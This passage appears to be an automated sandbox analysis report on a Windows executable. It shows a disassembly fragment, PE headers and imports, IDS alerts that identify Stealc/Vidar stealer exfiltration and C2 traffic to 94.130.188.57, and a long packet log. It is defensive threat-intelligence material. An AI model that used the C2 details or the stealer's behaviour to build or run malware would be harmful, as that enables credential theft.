                                                                                                                                                                                                                                                                                    push dword ptr [ecx]
                                                                                                                                                                                                                                                                                    rol dl, 00000010h
                                                                                                                                                                                                                                                                                    add ah, cl
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    push 00420553h
                                                                                                                                                                                                                                                                                    call dword ptr [004219D4h]
                                                                                                                                                                                                                                                                                    mov dword ptr [006351C4h], eax
                                                                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                                                                    je 00007F4CE8DB26A4h
                                                                                                                                                                                                                                                                                    push 00420101h
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9ECA2h
                                                                                                                                                                                                                                                                                    mov dword ptr [00634F6Ch], eax
                                                                                                                                                                                                                                                                                    push 00420CB1h
                                                                                                                                                                                                                                                                                    push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9EC8Dh
                                                                                                                                                                                                                                                                                    mov dword ptr [00634F68h], eax
                                                                                                                                                                                                                                                                                    push 00420D79h
                                                                                                                                                                                                                                                                                    push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9EC78h
                                                                                                                                                                                                                                                                                    mov dword ptr [00634F70h], eax
                                                                                                                                                                                                                                                                                    push 00420D50h
                                                                                                                                                                                                                                                                                    push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9EC63h
                                                                                                                                                                                                                                                                                    mov dword ptr [00634FD8h], eax
                                                                                                                                                                                                                                                                                    push 00420D5Bh
                                                                                                                                                                                                                                                                                    push dword ptr [006351C4h]
                                                                                                                                                                                                                                                                                    call 00007F4CE8D9EC4Eh

                                                                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x217280xc8.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2370000x149c.reloc
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1fbd80x5c.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x219880x198.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                    .text0x10000x1dd780x1de000ce5587661d15577632e53c8a6001885False0.5060800209205021data6.454457697482663IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    .rdata0x1f0000x31cc0x3200fd29d8756d3862857221531ababec3deFalse0.491328125DOS executable (block device driver)5.681327123118545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .data0x230000x2121e00x1600bc81a9497a63b536266387a4e7cae584unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    .00cfg0x2360000x40x20007ada419974a1f82db6bdd49d543272bFalse0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .reloc0x2370000x149c0x1600087859e7d46786662434790d6717c7baFalse0.7935014204545454data6.591187625006626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                                    KERNEL32.dllCloseHandle, CreateDirectoryA, CreateFileA, CreateThread, ExitProcess, ExpandEnvironmentStringsA, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetCurrentProcess, GetDriveTypeA, GetFileInformationByHandle, GetFileSize, GetLastError, GetLocalTime, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleHandleA, GetProcessHeap, GetTickCount, HeapAlloc, HeapFree, OpenProcess, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, Sleep, SystemTimeToFileTime, VirtualAlloc, VirtualAllocExNuma, VirtualFree, VirtualQueryEx, WaitForSingleObject, WriteFile, lstrcatA, lstrcmpiW, lstrcpyA, lstrlenA
                                                                                                                                                                                                                                                                                    msvcrt.dll??2@YAPAXI@Z, ??3@YAXPAX@Z, ??_U@YAPAXI@Z, ??_V@YAXPAX@Z, _itoa_s, _splitpath, atexit, free, isupper, malloc, memchr, memcmp, memcpy, memmove, memset, rand, srand, strchr, strcmp, strcpy, strcpy_s, strlen, strncpy, strstr, strtok_s
                                                                                                                                                                                                                                                                                    USER32.dllCharToOemA, CloseDesktop, CreateDesktopA, GetDesktopWindow, OpenDesktopA, wsprintfA, wsprintfW
                                                                                                                                                                                                                                                                                    api-ms-win-crt-runtime-l1-1-0.dll_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                    api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsnprintf_s
                                                                                                                                                                                                                                                                                    ADVAPI32.dllGetCurrentHwProfileA, GetUserNameA, RegGetValueA, RegOpenKeyExA
                                                                                                                                                                                                                                                                                    SHELL32.dllSHFileOperationA, SHGetFolderPathA
                                                                                                                                                                                                                                                                                    WS2_32.dllWSACleanup, WSAStartup, closesocket, connect, freeaddrinfo, getaddrinfo, htons, recv, send, socket
                                                                                                                                                                                                                                                                                    SHLWAPI.dllPathFileExistsA

                                                                                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                    2024-12-23T06:57:22.889027+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.54970694.130.188.57443TCP
                                                                                                                                                                                                                                                                                    2024-12-23T06:57:27.806148+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.54970894.130.188.57443TCP
                                                                                                                                                                                                                                                                                    2024-12-23T06:57:27.806392+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config194.130.188.57443192.168.2.549708TCP
                                                                                                                                                                                                                                                                                    2024-12-23T06:57:30.110607+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1194.130.188.57443192.168.2.549709TCP

                                                                                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:12.441732883 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:12.551091909 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:15.647217035 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:15.647257090 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:15.647341013 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:15.656754971 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:15.656768084 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.030865908 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.030988932 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.196999073 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.197032928 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.197444916 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.199281931 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.199282885 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.243335962 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.642184973 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.642231941 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.642257929 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.642318010 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.642326117 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.642348051 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.642401934 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.656004906 CET49704443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.656033993 CET44349704149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.934917927 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.934987068 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.935059071 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.935349941 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:17.935360909 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:19.756352901 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:19.756474972 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:19.761857986 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:19.761887074 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:19.762342930 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:19.762419939 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:19.762784004 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:19.807329893 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.439373970 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.439455032 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.439471960 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.439519882 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.439577103 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.439626932 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.452214956 CET49705443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.452231884 CET4434970594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.595876932 CET49706443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.595941067 CET4434970694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.596023083 CET49706443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.596287012 CET49706443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:20.596298933 CET4434970694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:21.996336937 CET4434970694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:21.996570110 CET49706443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:21.997163057 CET49706443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:21.997173071 CET4434970694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:21.998877048 CET49706443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:21.998887062 CET4434970694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:22.051297903 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:22.160536051 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:22.889084101 CET4434970694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:22.889189005 CET4434970694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:22.889369011 CET49706443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:22.889369011 CET49706443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:23.143819094 CET49706443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:23.143861055 CET4434970694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:23.194426060 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:23.194464922 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:23.194530010 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:23.195144892 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:23.195161104 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:24.548439980 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:24.548760891 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:24.600600958 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:24.600816011 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:24.601744890 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:24.601758003 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:24.603807926 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:24.603815079 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490365028 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490434885 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490505934 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490530014 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490551949 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490571022 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490602016 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490647078 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490928888 CET49707443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.490946054 CET4434970794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.503712893 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.503827095 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.503988981 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.504370928 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:25.504407883 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.911860943 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.911979914 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.912674904 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.912691116 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.915257931 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:26.915266991 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806175947 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806205988 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806286097 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806322098 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806355000 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806957006 CET49708443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.806979895 CET4434970894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.817378998 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.817421913 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.817816019 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.818145990 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:27.818156958 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.217394114 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.217660904 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.218377113 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.218386889 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.220679045 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:29.220686913 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110373974 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110476971 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110488892 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110537052 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110897064 CET49709443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.110918045 CET4434970994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141505957 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141549110 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141625881 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141911030 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:30.141921997 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136457920 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136506081 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136683941 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136827946 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.136835098 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.543982029 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.544063091 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.544907093 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.544925928 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.546861887 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.546871901 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.546932936 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:31.546951056 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.522208929 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.522281885 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.522331953 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.522418976 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.523273945 CET49710443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.523338079 CET4434971094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.535396099 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.535456896 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.536303043 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.536310911 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.571188927 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:32.571197987 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.589756966 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.589842081 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.589926004 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.589926004 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.796689987 CET49711443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.796719074 CET4434971194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.969917059 CET49713443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.969957113 CET44349713142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.970020056 CET49713443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.970671892 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.970726967 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.970792055 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.970971107 CET49715443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.970983982 CET44349715142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.971056938 CET49715443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.971077919 CET49716443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.971117973 CET44349716142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.971167088 CET49716443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.972891092 CET49716443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.972917080 CET44349716142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.973331928 CET49715443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.973344088 CET44349715142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.973478079 CET49714443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.973500967 CET44349714142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.973628044 CET49713443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:33.973644018 CET44349713142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:35.666944027 CET44349716142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:35.667327881 CET49716443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:35.667356014 CET44349716142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:35.668453932 CET44349716142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:35.668530941 CET49716443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:35.671658039 CET49716443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:35.671762943 CET44349716142.250.181.132192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:35.671874046 CET49716443192.168.2.5142.250.181.132
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:35.671881914 CET44349716142.250.181.132192.168.2.5
